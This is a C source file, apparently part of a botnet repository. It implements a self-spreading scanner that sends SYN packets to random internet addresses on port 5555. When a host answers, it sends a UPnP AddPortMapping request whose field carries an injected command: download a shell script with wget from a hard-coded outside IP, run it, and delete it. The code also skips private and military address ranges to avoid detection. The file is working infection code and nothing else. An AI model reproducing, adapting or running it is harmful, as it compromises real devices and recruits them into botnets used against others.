Path: blob/master/Botnets/Self Reps/ADB/adb_scanner.c
5038 views
#ifdef SELFREP12#define _GNU_SOURCE34#ifdef DEBUG5#include <stdio.h>6#endif7#include <unistd.h>8#include <stdlib.h>9#include <sys/socket.h>10#include <arpa/inet.h>11#include <sys/select.h>12#include <sys/types.h>13#include <time.h>14#include <fcntl.h>15#include <signal.h>16#include <errno.h>17#include <string.h>18#include <linux/ip.h>19#include <linux/tcp.h>2021#include "includes.h"22#include "adb_scanner.h"23#include "table.h"24#include "rand.h"25#include "util.h"26#include "checksum.h"2728int exploit_scanner_pid = 0, exploit_rsck = 0, exploit_rsck_out = 0;29char exploit_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};30struct exploit_scanner_connection *conn_table;31uint32_t exploit_fake_time = 0;3233int exploit_recv_strip_null(int sock, void *buf, int len, int flags)34{35int ret = recv(sock, buf, len, flags);3637if(ret > 0)38{39int i = 0;4041for(i = 0; i < ret; i++)42{43if(((char *)buf)[i] == 0x00)44{45((char *)buf)[i] = 'A';46}47}48}4950return ret;51}5253void exploit_init(void)54{55int i = 0;56uint16_t source_port;57struct iphdr *iph;58struct tcphdr *tcph;5960// Let parent continue on main thread61exploit_scanner_pid = fork();62if(exploit_scanner_pid > 0 || exploit_scanner_pid == -1)63return;6465LOCAL_ADDR = util_local_addr();6667rand_init();68exploit_fake_time = time(NULL);69conn_table = calloc(EXPLOIT_SCANNER_MAX_CONNS, sizeof(struct exploit_scanner_connection));70for(i = 0; i < EXPLOIT_SCANNER_MAX_CONNS; i++)71{72conn_table[i].state = EXPLOIT_SC_CLOSED;73conn_table[i].fd = -1;74}7576// Set up raw socket scanning and payload77if((exploit_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)78{79exit(0);80}81fcntl(exploit_rsck, F_SETFL, O_NONBLOCK | fcntl(exploit_rsck, F_GETFL, 0));82i = 1;83if(setsockopt(exploit_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)84{85close(exploit_rsck);86exit(0);87}8889do90{91source_port = rand_next() & 0xffff;92}93while(ntohs(source_port) < 1024);9495iph = (struct iphdr *)exploit_scanner_rawpkt;96tcph = (struct tcphdr *)(iph + 1);9798// Set up IPv4 header99iph->ihl = 5;100iph->version = 4;101iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));102iph->id = rand_next();103iph->ttl = 64;104iph->protocol = IPPROTO_TCP;105106// Set up TCP header107tcph->dest = htons(5555);108tcph->source = source_port;109tcph->doff = 5;110tcph->window = rand_next() & 0xffff;111tcph->syn = TRUE;112113#ifdef DEBUG114printf("[adb] scanner process initialized. scanning started.\n");115#endif116117// Main logic loop118while(TRUE)119{120fd_set fdset_rd, fdset_wr;121struct exploit_scanner_connection *conn;122struct timeval tim;123int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;124125// Spew out SYN to try and get a response126if(exploit_fake_time != last_spew)127{128last_spew = exploit_fake_time;129130for(i = 0; i < EXPLOIT_SCANNER_RAW_PPS; i++)131{132struct sockaddr_in paddr = {0};133struct iphdr *iph = (struct iphdr *)exploit_scanner_rawpkt;134struct tcphdr *tcph = (struct tcphdr *)(iph + 1);135136iph->id = rand_next();137iph->saddr = LOCAL_ADDR;138iph->daddr = get_random_ip();139iph->check = 0;140iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));141142tcph->dest = htons(5555);143tcph->seq = iph->daddr;144tcph->check = 0;145tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));146147paddr.sin_family = AF_INET;148paddr.sin_addr.s_addr = iph->daddr;149paddr.sin_port = tcph->dest;150151sendto(exploit_rsck, exploit_scanner_rawpkt, sizeof(exploit_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));152}153}154155// Read packets from raw socket to get SYN+ACKs156last_avail_conn = 0;157while(TRUE)158{159int n = 0;160char dgram[1514];161struct iphdr *iph = (struct iphdr *)dgram;162struct tcphdr *tcph = (struct tcphdr *)(iph + 1);163struct exploit_scanner_connection *conn;164165errno = 0;166n = recvfrom(exploit_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);167if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)168break;169170if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))171continue;172if(iph->daddr != LOCAL_ADDR)173continue;174if(iph->protocol != IPPROTO_TCP)175continue;176if(tcph->source != htons(5555))177continue;178if(tcph->dest != source_port)179continue;180if(!tcph->syn)181continue;182if(!tcph->ack)183continue;184if(tcph->rst)185continue;186if(tcph->fin)187continue;188if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)189continue;190191conn = NULL;192for(n = last_avail_conn; n < EXPLOIT_SCANNER_MAX_CONNS; n++)193{194if(conn_table[n].state == EXPLOIT_SC_CLOSED)195{196conn = &conn_table[n];197last_avail_conn = n;198break;199}200}201202// If there were no slots, then no point reading any more203if(conn == NULL)204break;205206conn->dst_addr = iph->saddr;207conn->dst_port = tcph->source;208exploit_setup_connection(conn);209}210211FD_ZERO(&fdset_rd);212FD_ZERO(&fdset_wr);213214for(i = 0; i < EXPLOIT_SCANNER_MAX_CONNS; i++)215{216int timeout = 5;217218conn = &conn_table[i];219//timeout = (conn->state > EXPLOIT_SC_CONNECTING ? 30 : 5);220221if(conn->state != EXPLOIT_SC_CLOSED && (exploit_fake_time - conn->last_recv) > timeout)222{223close(conn->fd);224conn->fd = -1;225conn->state = EXPLOIT_SC_CLOSED;226util_zero(conn->rdbuf, sizeof(conn->rdbuf));227228continue;229}230231if(conn->state == EXPLOIT_SC_CONNECTING || conn->state == EXPLOIT_SC_EXPLOIT_STAGE2 || conn->state == EXPLOIT_SC_EXPLOIT_STAGE3)232{233FD_SET(conn->fd, &fdset_wr);234if(conn->fd > mfd_wr)235mfd_wr = conn->fd;236}237else if(conn->state != EXPLOIT_SC_CLOSED)238{239FD_SET(conn->fd, &fdset_rd);240if(conn->fd > mfd_rd)241mfd_rd = conn->fd;242}243}244245tim.tv_usec = 0;246tim.tv_sec = 1;247nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);248exploit_fake_time = time(NULL);249250for(i = 0; i < EXPLOIT_SCANNER_MAX_CONNS; i++)251{252conn = &conn_table[i];253254if(conn->fd == -1)255continue;256257if(FD_ISSET(conn->fd, &fdset_wr))258{259int err = 0, ret = 0;260socklen_t err_len = sizeof(err);261262ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);263if(err == 0 && ret == 0)264{265if(conn->state == EXPLOIT_SC_EXPLOIT_STAGE2)266{267#ifdef DEBUG268printf("[adb] FD%d exploit_stage=2. sending POST /UD/?9 to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);269#endif270util_strcpy(conn->payload_buf, "POST /UD/?9 HTTP/1.1\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Type: text/xml\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:AddPortMapping xmlns:u=\"urn:schemas-upnp-org:service:WANIPConnection:1\"><NewRemoteHost></NewRemoteHost><NewExternalPort>47449</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`>/tmp/.e && cd /tmp; >/var/dev/.e && cd /var/dev; wget http://212.60.5.149/adb.sh; chmod 777 adb.sh; sh adb.sh; rm adb.sh;`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>");271send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);272util_zero(conn->payload_buf, sizeof(conn->payload_buf));273util_zero(conn->rdbuf, sizeof(conn->rdbuf));274275conn->state = EXPLOIT_SC_EXPLOIT_STAGE3;276277continue;278}279else if(conn->state == EXPLOIT_SC_EXPLOIT_STAGE3)280{281#ifdef DEBUG282printf("[adb] FD%d exploit_stage=3. closing connection\n", conn->fd);283#endif284close(conn->fd);285conn->fd = -1;286conn->state = EXPLOIT_SC_CLOSED;287288continue;289}290else291{292#ifdef DEBUG293printf("[adb] FD%d exploit_stage=1. connection to %d.%d.%d.%d successful. proceeding to stage 2\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);294#endif295conn->state = EXPLOIT_SC_EXPLOIT_STAGE2;296}297}298else299{300close(conn->fd);301conn->fd = -1;302conn->state = EXPLOIT_SC_CLOSED;303304continue;305}306}307308if(FD_ISSET(conn->fd, &fdset_rd))309{310while(TRUE)311{312int ret = 0;313314if(conn->state == EXPLOIT_SC_CLOSED)315break;316317if(conn->rdbuf_pos == EXPLOIT_SCANNER_RDBUF_SIZE)318{319memmove(conn->rdbuf, conn->rdbuf + EXPLOIT_SCANNER_HACK_DRAIN, EXPLOIT_SCANNER_RDBUF_SIZE - EXPLOIT_SCANNER_HACK_DRAIN);320conn->rdbuf_pos -= EXPLOIT_SCANNER_HACK_DRAIN;321}322323errno = 0;324ret = exploit_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, EXPLOIT_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);325if(ret == 0)326{327errno = ECONNRESET;328ret = -1;329}330if(ret == -1)331{332if(errno != EAGAIN && errno != EWOULDBLOCK)333{334if(conn->state == EXPLOIT_SC_EXPLOIT_STAGE2)335{336close(conn->fd);337exploit_setup_connection(conn);338continue;339}340341close(conn->fd);342conn->fd = -1;343conn->state = EXPLOIT_SC_CLOSED;344util_zero(conn->rdbuf, sizeof(conn->rdbuf));345}346break;347}348349conn->rdbuf_pos += ret;350conn->last_recv = exploit_fake_time;351352int len = util_strlen(conn->rdbuf);353conn->rdbuf[len] = 0;354}355}356}357}358}359360void exploit_kill(void)361{362kill(exploit_scanner_pid, 9);363}364365static void exploit_setup_connection(struct exploit_scanner_connection *conn)366{367struct sockaddr_in addr = {0};368369if(conn->fd != -1)370close(conn->fd);371372if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)373{374return;375}376377conn->rdbuf_pos = 0;378util_zero(conn->rdbuf, sizeof(conn->rdbuf));379380fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));381382addr.sin_family = AF_INET;383addr.sin_addr.s_addr = conn->dst_addr;384addr.sin_port = conn->dst_port;385386conn->last_recv = exploit_fake_time;387388if(conn->state == EXPLOIT_SC_EXPLOIT_STAGE2 || conn->state == EXPLOIT_SC_EXPLOIT_STAGE3)389{390}391else392{393conn->state = EXPLOIT_SC_CONNECTING;394}395396connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));397}398399static ipv4_t get_random_ip(void)400{401uint32_t tmp;402uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;403404do405{406tmp = rand_next();407408srand(time(NULL));409o1 = tmp & 0xff;410o2 = (tmp >> 8) & 0xff;411o3 = (tmp >> 16) & 0xff;412o4 = (tmp >> 24) & 0xff;413}414while(o1 == 127 || // 127.0.0.0/8 - Loopback415(o1 == 0) || // 0.0.0.0/8 - Invalid address space416(o1 == 3) || // 3.0.0.0/8 - General Electric Company417(o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company418(o1 == 56) || // 56.0.0.0/8 - US Postal Service419(o1 == 10) || // 10.0.0.0/8 - Internal network420(o1 == 192 && o2 == 168) || // 192.168.0.0/16 - Internal network421(o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.0.0/14 - Internal network422(o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved423(o1 == 169 && o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved424(o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA Special use425(o1 >= 224) || // 224.*.*.*+ - Multicast426(o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense427);428429return INET_ADDR(o1,o2,o3,o4);430431/*int randnum = rand() % 3;432if (randnum == 0)433{434return INET_ADDR(156,o2,o3,o4);435}436if (randnum == 1)437{438return INET_ADDR(197,o2,o3,o4);439}440if (randnum == 2)441{442return INET_ADDR(41,o2,o3,o4);443}444if (randnum == 3)445{446return INET_ADDR(o1,o2,o3,o4);447}*/448}449450#endif451452453454